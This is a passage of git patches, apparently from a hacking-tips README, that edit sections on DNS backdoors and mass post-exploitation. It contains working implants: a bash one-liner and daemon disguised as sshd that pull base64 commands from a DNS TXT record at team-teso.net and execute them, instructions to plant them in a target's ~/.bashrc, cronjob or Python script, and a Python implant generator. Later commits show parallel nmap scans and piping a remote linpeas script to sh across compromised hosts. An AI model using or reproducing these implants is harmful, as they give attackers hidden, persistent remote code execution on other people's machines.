redirect _also_ errors from $()-subshell to /dev/null: bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null ``` -An elaborate DNS reverse backdoor (as a daemon and living-off-the-land): +or change the demo-payload for an elaborate payload: +- Starts a background daemon to poll every hour for command execution. - Depends on bash, dig and base64 only. - Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups` -- Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net). -- Base64-decodes the TXT record and executes the command on the target. (the test command creates /tmp/.b00m). - -1. Generate a 1-line implant: +- Example uses `b00m2.team-teso.net` again and creates /tmp/.b00m every hour. +Cut & Paste the following into the target's shell to generate the 1-line implant: ```shell # If dig does not exists then replace /dig +short.../ with -# /nslookup -q=txt '"$D"'|grep -Fm1 "text ="|sed -E "s|.*text = (.*)|\1|g;s|[\" ]||g"|base64 -d +# /nslookup -q=txt '"$D"'|grep -Fm1 "text ="|sed -E "s|.*text = (.*)|\1|g;s|[\" ]||g"|base64 -d|bash/ # or use the Perl example below. base64 -w0 >x.txt <<-'EOF' D=b00m2.team-teso.net @@ -1927,16 +1930,11 @@ while :; do slp 3600 done'|exec -a "$P" bash &) &>/dev/null EOF -echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $( Add the following to the target's ~/.bashrc or cronjob:"$'\n\033[0;36m'"echo $(,"")' >x.txt <<-'EOF' @@ -1960,6 +1960,34 @@ echo "===> Execute the following on the target:"$'\n\033[0;36m'"perl -MMIME::Bas rm -f x.txt ``` (thank you to LouCipher for a perl verison) + +...in PYTHON: +--- +Cut & paste the following into your shell: +```shell +pydnsbackdoorgen() { + local str + echo -e "This is the TXT record for ${1:?}\e[0;33m" + base64 -w0 <"${2:?}" + str="$(echo -en 'import dns.resolver\nexec(base64.b64decode("".join([d.to_text() for d in dns.resolver.resolve("'"${1:?}"'", "TXT").rrset])))' | base64 -w 0)" + echo -e "\e[0m\nThis is your implant string (add this to the target's python script):\e[0;32m" + echo "exec('"'try:\n\timport base64\n\texec(base64.b64decode("'"${str}"'"))\nexcept:\n\tpass'"')" + echo -e "\e[0m" +} +``` + +Generate your payload: +``` +cat >egg.py<<-'EOF' +import time +dns.resolver.resolve(f"{int(time.time())}.vgnigskswpbmnhbkyoalc9ufgwru330sj.oast.fun") +EOF +``` + +Generate your implant: +``` +pydnsbackdoorgen b00mpy.team-teso.net egg.py +``` **6.vii. Local Root Backdoor** From ba530832a9fdc52835a158bb00f722984b28139b Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Jun 2025 18:28:51 +0100 Subject: [PATCH 20/23] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 04f5941..1f30d0e 100644 --- a/README.md +++ b/README.md @@ -1970,22 +1970,22 @@ pydnsbackdoorgen() { echo -e "This is the TXT record for ${1:?}\e[0;33m" base64 -w0 <"${2:?}" str="$(echo -en 'import dns.resolver\nexec(base64.b64decode("".join([d.to_text() for d in dns.resolver.resolve("'"${1:?}"'", "TXT").rrset])))' | base64 -w 0)" - echo -e "\e[0m\nThis is your implant string (add this to the target's python script):\e[0;32m" + echo -e "\e[0m\nAdd this implant string to a target's python script:\e[0;32m" echo "exec('"'try:\n\timport base64\n\texec(base64.b64decode("'"${str}"'"))\nexcept:\n\tpass'"')" echo -e "\e[0m" } ``` Generate your payload: -``` +```shell cat >egg.py<<-'EOF' import time -dns.resolver.resolve(f"{int(time.time())}.vgnigskswpbmnhbkyoalc9ufgwru330sj.oast.fun") +dns.resolver.resolve(f"{int(time.time())}.yzlespkpfkqfrtwgvhngkyqbuod49rgmo.oast.fun") EOF ``` Generate your implant: -``` +```shell pydnsbackdoorgen b00mpy.team-teso.net egg.py ``` From 133869552397bf4ca8c7a337078c3bfad8fd8a7a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 5 Jun 2025 18:33:57 +0100 Subject: [PATCH 21/23] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1f30d0e..d90d4f5 100644 --- a/README.md +++ b/README.md @@ -1976,7 +1976,7 @@ pydnsbackdoorgen() { } ``` -Generate your payload: +Generate your payload (`egg.py` will get executed on the target): ```shell cat >egg.py<<-'EOF' import time @@ -1984,7 +1984,7 @@ dns.resolver.resolve(f"{int(time.time())}.yzlespkpfkqfrtwgvhngkyqbuod49rgmo.oast EOF ``` -Generate your implant: +Generate your implant (and follow the instructions): ```shell pydnsbackdoorgen b00mpy.team-teso.net egg.py ``` From 3dde3f2a7329bb181b657d2b99b5c62005cbd8fa Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 14 Jun 2025 11:54:41 +0100 Subject: [PATCH 22/23] Update README.md --- README.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index d90d4f5..3ce708a 100644 --- a/README.md +++ b/README.md @@ -352,20 +352,20 @@ echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(a **1.ix. Execute in parallel with separate logfiles*** -Scan 20 hosts in parallel and log each result to a separate log file: +Note: The same can be achieved with [parallel](https://www.gnu.org/software/parallel/parallel_tutorial.html). + +Scan hosts in 20 parallel tasks: ```sh -# hosts.txt contains a long list of hostnames or ip-addresses -# (Use -sCV for more verbose version) -cat hosts.txt | parallel -j20 'exec nmap -n -Pn -sV -F --open -oG - {} >nmap_{}.txt' +cat hosts.txt | xargs -P20 -I{} --process-slot-var=SLOT bash -c 'exec nmap -n -Pn -sV -F --open -oG - {} >>"nmap_${SLOT}.txt"' ``` -Note: The example uses `exec` to replace the underlying shell with the last process (nmap, gsexec). It's optional but reduces the number of running shell binaries. +- Use `exec` to replace the underlying shell with the last process (nmap). It's optional but reduces the number of running shell binaries. +- ${SLOT} contains a value between 0..19 and is the "task number". We use it to write the results into 20 separate files. Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: ```sh -# secrets.txt contains a long list of gsocket-secrets for each remote server. -cat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' +cat secrets.txt | xargs -P40 -I{} bash -c 'mkdir host_{}; gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>>"linpeas-${SLOT}.err"' ``` -Note: `xargs -P20 -I{}` is another good way but it cannot log each output into a separate file. +- Log each result into a separate file but log all errors into a error-log file by task-number. --- From 2010ccfee5e2a6218ec95b608d1a4af3ce995606 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 14 Jun 2025 11:59:49 +0100 Subject: [PATCH 23/23] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 3ce708a..f731444 100644 --- a/README.md +++ b/README.md @@ -354,16 +354,16 @@ echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(a Note: The same can be achieved with [parallel](https://www.gnu.org/software/parallel/parallel_tutorial.html). -Scan hosts in 20 parallel tasks: +Scan hosts with 20 parallel tasks: ```sh cat hosts.txt | xargs -P20 -I{} --process-slot-var=SLOT bash -c 'exec nmap -n -Pn -sV -F --open -oG - {} >>"nmap_${SLOT}.txt"' ``` -- Use `exec` to replace the underlying shell with the last process (nmap). It's optional but reduces the number of running shell binaries. -- ${SLOT} contains a value between 0..19 and is the "task number". We use it to write the results into 20 separate files. +- `exec` is used to replace the underlying shell with the last process (nmap). It's optional but reduces the number of running/useless shell binaries. +- `${SLOT}` contains a value between 0..19. It's the "task number". We use it to write the nmap-results into 20 separate files. Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: ```sh -cat secrets.txt | xargs -P40 -I{} bash -c 'mkdir host_{}; gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>>"linpeas-${SLOT}.err"' +cat secrets.txt | xargs -P40 -I{} --process-slot-var=SLOT bash -c 'mkdir host_{}; gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>>"linpeas-${SLOT}.err"' ``` - Log each result into a separate file but log all errors into a error-log file by task-number.